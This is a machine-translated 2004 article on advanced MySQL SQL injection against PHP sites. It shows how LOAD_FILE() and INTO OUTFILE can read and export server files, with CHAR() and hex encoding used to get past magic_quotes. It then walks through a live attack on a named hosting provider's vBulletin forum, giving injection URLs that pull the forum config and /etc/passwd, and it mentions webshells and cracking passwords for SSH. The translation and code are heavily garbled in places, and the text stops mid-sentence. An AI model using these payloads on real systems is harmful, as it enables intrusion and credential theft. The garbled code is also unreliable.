Advanced SQL Injection with MySQL author: angel article in Nature: Original release date: 2004-07-14 Text / security Angels · angel [BST] preface my "SQL Injection with MySQL" ( "hacker line of defense" in July of topics) There is a comprehensive introduction to MySQL's injection, but there is a very harmful function, I have not mentioned in the text, because if you can flexibly apply this function, the PHP or even the security of the server will be greatly reduced. Since the publication of "SQL Injection with MySQL" during the summer vacation, considering many newers, students and morally corrupted people, I didn't write this in this article, in fact, this article has been written in early May. After the topic, many people have turned to PHP MySQL injection research, and many new technologies will be excavated, and we have mastered the unusless senior skills will be announced. As for the relatively basic thing, this article is no longer mentioned. In detail, in the SQL statement, you can use a variety of MySQL built-in functions, often use Database (), user (), system_user (), session_user (), current_user () these functions to get some system information, There is also a more function that is more use, that is, load_file (), the function of this function is to read the file and return the file as a string. Seeing this, you should think of what we can do, just read some confidential documents, but it is also conditional restrictions:
To read the file must specify the full path of the file on the server must have permission to read and the file must read with the file must be smaller than max_allowed_packet if the file does not exist, or because of any of the above reasons cannot be read The function returns to empty. More difficult is permission, under Windows, if the NTFS is set properly, you cannot read the relevant file, when you encounter the file that only Administrators can access, users don't want to go out. In actual injection, we have two difficulties to solve:
Absolute physical path construction effective malformed statement in many PHP programs, when submitting a wrong Query, if Display_errors = ON, the program exposes the absolute path of the web directory, as long as the path is known, then for an injected PHP program The security of the entire server will be seriously threatened. The constructing statement is already small. Use us to assume that the SQL statement of a program is as follows:
Select * from article where articleid = $ ID Note: Current conditions: magic_quotes_gpc = OFF, C: /Boot.ini is readable. At this point, we construct $ ID as:
-1 Union SELECT 1, 1, 1, 1, LOAD_FILE ('c: /boot.ini') Our Query became:
Select * from article where articleid = -1 Union SELECT 1, 1, 1, 1, load_file ('c: /boot.ini') program will display C: /Boot.ini content, but now Magic_QUOTES_GPC = The owner of OFF has fewer, how can I construct a statement without quotation marks? Friends who have seen "SQL INJECTION with MySQL" must know that with a char () function or convert the character into 16, it is true, that is, it. Note: Current conditions: magic_quotes_gpc = ON, C: /Boot.ini is readable. We construct $ ID: -1 Union Select 1, 1, 1, loading_file (char (99, 58, 47, 98, 111, 105)) "CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)" is "C: / Boot.ini "ASCII code, our query is turning:
Select * from article where articles = -1 Union SELECT 1, 1, 1, LOAD_FILE (Char (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)) We can also successfully read the boot.ini file, and transform strings The 16-based 16-based, "c: /boot.ini" is "0x633A2F626F6F742E696E69", so the above statement can be like this:
Select * from article where articleid = -1 Union SELECT 1, 1, 1, LOAD_FILE (0x633A2f626f6f742e696e69) is relatively short, see everyone is happy, you can enter the following query under phpmyadmin or mysql> slowly study.
SELECT LOAD_FILE ([String]) Of course, in practical applications, due to various conditions, the content of the file may not be displayed, we can also export files with INTO OUTFILE. Everyone has known how to use it, I don't say a detail, see an instance explains everything. Example www. *** Host.cn is a famous FreeBSD host provider, we will test him, because it uses the VBB Forum in Calendar.php, I don't need to find a vulnerability everywhere. Site (although it is everywhere). This is a complete safety test. Just get information, I didn't enter the server. Here, additional explanation of a piece of code on the Global.php of the VBB, as follows:
// Get Rid of Slashes IN GET / POST / COOKIE DATAFUNCTION STRIPSLASHESARRAY (& $ arr) {While ($ es "= Each ($ arr)) {if ($ key! =" Templatesused "and $ key ! = "argc" and $ key! = "argv") {if (is_string ($ key)! = $ key or "" "======================================================================= )) {$ ARR ["$ key"] = StripsLashs ($ val);} else if (is_ARRAY ($ key == 'http_post_vars' or $ key == 'http_get_vars' or stropper ($ key) ! = $ eEY)) {$ Arr ["$ key"] = Stripslasheser ($ VAL);}}} Return $ arr;}}}} f (get_magic_quotes_gpc () and is_ARRAY ($ global)) {if (isset ($ attachment) ) {$ Globals ['attachment'] = addslashes ($ globals ['attachment');} if ($ avatarfile) {$ globals ['avatarfile'] = addslashes ($ globals ['avatarfile']; } $ Global = stripslasheser ($ global);} set_magic_quotes_runtime (0); this code is the role of this code is that if Magic_QUOTES_GPC is opened, it removes the front escape character of all special characters, so, regardless of the state of Magic_QUOTES_GPC in php.ini, There is no impact on the single quotes we entered. You can inject it. Ha ha. We know, submit: /calendar.php? Action = Edit & EventID = 1 Union SELECT 1, 1, 1, 1, userid = 1 is to get the username and password MD5 hash, but due to special reasons, Not displayed, but with my experience, I know that there is no configuration, so we can read and export into files. Because I have no intention to access files containing phpinfo () in advance, I know the absolute path of the web. From the accessed site, I found that a download system is generated by generating an HTML file. If that directory does not write permission, it is not possible to generate HTML Document, but all this is not the focus of this article, we now master the following information:
Web absolute path: / home / 4ngel can write directory path: / home / 4ngel / Soft / Magic_QUOTES_GPC = On and host root Compared to host roots, the forum is not yet, I am not interested in the forum admin, we have to read The profile of the forum has / etc / passwd, knows the connection information of MySQL, you can start from here, write Webshell or other things, know / etc / passwd we can run the password. Go directly from SSH. VBB Forum configuration file in /Home/4Ngel/forum/admin/config.php, converts to ASCII code, submitted: Calendar.php? Action = Edit & EventId = 1 Union Select 1, 1, 1, 1, 1, loading_file (char (47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user wHERE userid = 1 into outfile '/home/4ngel/soft/cfg.txt' Oh, plus remember to set a condition where a Otherwise, if the forum is a lot, then the exported file will be quite large. Or simply specify $ EventID as a value that does not exist, you don't have WHERE, just like this:
calendar.php? action = edit & eventid = -1 UNION SELECT 1,1,1,1,1, load_file (char (47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile ' /HOME/4Ngel/soft/cfg.txt '/ etc / passwd is converted to ASCII code, submitted:
Calendar.php? Action = Edit & EventId = -1 Union SELECT 1, 1, 1, 1, 1, LOAD_FILE (CHAR (47, 101, 115, 115, 47, 112, 97, 115, 115, 119, 100)) from user into outfile '/Home/4Ngel/soft/etcpwd.txtxtXT 'Pay attention to see the top of the forum, the following error tips appear:
Warning: mysql_fetch_Array (): Supplied Argument is not a value/4ngel/forum/admin/db_mysql.php on line 154 experience tells us that the file export is successful, submitted: